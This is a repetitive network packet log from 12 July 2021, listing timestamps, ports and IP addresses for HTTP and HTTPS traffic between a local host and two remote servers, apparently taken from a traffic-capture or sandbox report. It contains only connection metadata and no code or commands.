Jul 12, 2021 10:29:47.518820047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.518857956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.518873930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.518881083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.518912077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.518934011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.518960953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.518976927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519007921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519016981 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519032955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519047976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519057035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519131899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519140959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519165039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519186020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519203901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519222021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519237995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519270897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519287109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519309044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519332886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519337893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519395113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519692898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519721031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519742966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519762039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519783020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519807100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519826889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519845009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519869089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519885063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519902945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519925117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.519939899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.519957066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520018101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520077944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520117044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520190954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520198107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520302057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520328045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520359039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520366907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520390987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520401955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520425081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520447969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520469904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520479918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520503044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520519018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520534992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520556927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520584106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520608902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520652056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520837069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520863056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520909071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.520975113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.520999908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521023035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521039009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521055937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521078110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521100044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521114111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521132946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521141052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521161079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521182060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521205902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521217108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521238089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521259069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521269083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521300077 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521316051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521334887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521349907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521390915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521792889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521817923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521833897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521847963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.521881104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.521888018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522042990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522059917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522104979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522129059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522170067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522193909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522209883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522226095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522249937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522264004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522281885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522299051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522322893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522337914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522351980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522367954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522382975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522398949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.522420883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522447109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.522711039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525620937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525686026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525722980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525774956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.525783062 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.525811911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525850058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525895119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.525908947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525943041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.525985956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.526000023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526032925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526067019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526109934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.526125908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526164055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526190042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526213884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.526245117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.526259899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526279926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.526324034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.536936045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.537918091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538050890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538120985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.538145065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538168907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538187027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.538239002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538263083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538281918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.538302898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.538325071 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.656789064 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.656821966 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.656919956 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.787902117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.788050890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.883847952 CEST	443	49757	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:47.884058952 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.884517908 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.887965918 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.888072014 CEST	49757	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:47.900911093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.922782898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.922827005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.922846079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.922957897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925062895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925091028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925102949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925117016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925131083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925148964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925165892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925200939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925215960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925255060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925275087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925306082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925342083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925375938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925410986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925442934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925467014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925508022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925551891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925585985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925616026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925647020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925679922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925718069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925753117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925785065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925806046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925822973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.925865889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.925996065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.926143885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926388979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926407099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926470041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.926609039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926630020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926649094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926666975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926681042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.926692009 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.926745892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.926791906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927356958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927382946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927434921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.927450895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927473068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927490950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927508116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.927546978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.928294897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.928318024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.928388119 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.928402901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.928421021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.928442001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.928448915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.928467035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.928545952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.928991079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.929013014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.929073095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.929092884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.929104090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.929122925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.929152966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.929167032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.929194927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.930037975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930061102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930080891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930110931 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.930135965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930155039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930165052 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.930203915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.930213928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930841923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930864096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930876970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930891037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930912018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930931091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.930943012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.931061983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.931618929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.931699991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.931811094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.931829929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.931930065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.931947947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.931962013 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.931974888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932002068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.932459116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932699919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932718992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932737112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932754040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932790041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.932806969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.932833910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.932866096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.933321953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.933342934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.933511019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.933531046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.933542967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.933597088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.933635950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.933640957 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.934137106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.934159994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.934369087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.934525013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.934565067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.934580088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.934600115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.934631109 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.935019970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.935086012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.935158968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.935321093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.935338974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.935353041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.935363054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.935976982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936023951 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.936062098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936085939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936100960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936108112 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.936124086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936145067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936153889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.936877966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936902046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936917067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.936927080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.936999083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.937004089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.937026024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.937047005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.937066078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.937932014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.937954903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.937975883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.937984943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.938015938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.938025951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938043118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938054085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.938155890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938185930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.938488007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938539982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938566923 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.938600063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938616991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938630104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938646078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.938657045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.938677073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.939413071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.939438105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.939457893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.939470053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:47.939500093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:47.939585924 CEST	80	49755	47.254.186.176	192.168.2.3
